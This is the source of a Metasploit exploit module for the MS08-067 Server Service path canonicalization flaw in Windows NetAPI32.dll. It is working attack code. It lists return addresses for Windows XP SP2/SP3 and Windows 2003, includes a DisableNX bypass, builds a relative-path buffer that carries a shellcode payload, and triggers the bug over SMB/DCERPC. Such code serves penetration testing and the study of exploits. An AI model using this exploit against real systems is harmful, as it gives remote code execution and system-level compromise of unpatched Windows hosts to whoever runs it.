ms08_067_netapi.rb.txt

`##  
# $Id:$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/projects/Framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
  
include Msf::Exploit::Remote::DCERPC  
include Msf::Exploit::Remote::SMB  
  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Microsoft Server Service Relative Path Stack Corruption',  
'Description' => %q{  
This module exploits a parsing flaw in the path canonicalization code of  
NetAPI32.dll through the Server Service. This development version has   
been tested against Windows XP SP2 with DEP enabled.  
},  
'Author' =>   
[  
'hdm'  
],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 5773 $',  
'References' =>  
[  
[ 'MSB', 'MS08-067' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Privileged' => true,  
'Payload' =>  
{  
'Space' => 400,  
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>   
[  
[ 'Windows XP SP2 English', { 'Ret' => 0x6f88f727, 'DisableNX' => 0x6F8916E2, 'Scratch' => 0x00020408 }], # jmp esi / disablenx (acgenral.dll)  
[ 'Windows XP SP3 English', { 'Ret' => 0x6f88f807, 'DisableNX' => 0x6F8917C2, 'Scratch' => 0x00020408 }], # jmp esi / disablenx (acgenral.dll)  
  
[ 'Windows 2003 SP0 English', { 'Ret' => 0x71bf175f, 'DisableNX' => 0x71bf175f, 'Scratch' => 0x00020408 }], # jmp esi / jmp esi (ws2help.dll)  
],  
  
'DisclosureDate' => 'Oct 12 2008'))  
  
register_options(  
[  
OptString.new('SMBPIPE', [ true, "The pipe name to use (BROWSER, SRVSVC)", 'BROWSER']),  
], self.class)  
  
end  
  
def exploit   
  
# NET_API_STATUS NetprPathCanonicalize(  
# [in, string, unique] SRVSVC_HANDLE ServerName,  
# [in, string] WCHAR* PathName,  
# [out, size_is(OutbufLen)] unsigned char* Outbuf,  
# [in, range(0,64000)] DWORD OutbufLen,  
# [in, string] WCHAR* Prefix,  
# [in, out] DWORD* PathType,  
# [in] DWORD Flags  
# );  
  
# Padding is really picky for some reason  
padder = [*("A".."Z")]  
pad = "A"  
while(pad.length < 7)  
c = padder[rand(padder.length)]  
next if pad.index(c)  
pad += c  
end  
  
  
prefix = ""  
server = Rex::Text.rand_text_alpha(rand(8)+1).upcase  
  
jumper = Rex::Text.rand_text_alpha(70).upcase  
jumper[04,4] = [target.ret].pack("V") # jmp esi  
jumper[58,2] = "\xeb\x62"  
  
path =   
Rex::Text.to_unicode("\\") +  
  
# This buffer is removed from the front  
Rex::Text.rand_text_alpha(100) +   
  
# Shellcode  
payload.encoded +  
  
# Relative path to trigger the bug  
Rex::Text.to_unicode("\\..\\..\\") +   
  
# Extra padding  
Rex::Text.to_unicode(pad) +  
  
# Writable memory location (static)  
[target['Scratch']].pack("V") + # EBP  
  
# NS_DisableNX::g_szCommandLine() FTW (acgenral.dll)  
[target['DisableNX']].pack("V") +  
  
# Padding with embedded jump  
jumper +  
  
# NULL termination  
"\x00" * 2  
  
connect()  
smb_login()  
  
handle = dcerpc_handle(  
'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',   
'ncacn_np', ["\\#{datastore['SMBPIPE']}"]  
)  
  
print_status("Binding to #{handle} ...")  
dcerpc_bind(handle)  
print_status("Bound to #{handle} ...")  
  
stub =   
NDR.uwstring(server) +  
NDR.UnicodeConformantVaryingStringPreBuilt(path) +  
NDR.long(rand(1024)) +  
NDR.wstring("") +  
NDR.long(4097) +  
NDR.long(0)   
  
begin  
print_status("Triggering the vulnerability...")   
dcerpc.call(0x1f, stub)  
rescue Rex::Proto::DCERPC::Exceptions::NoResponse  
rescue => e  
if e.to_s !~ /STATUS_PIPE_DISCONNECTED/  
raise e  
end  
end  
  
# Cleanup  
handler  
disconnect  
end  
  
end  
  
`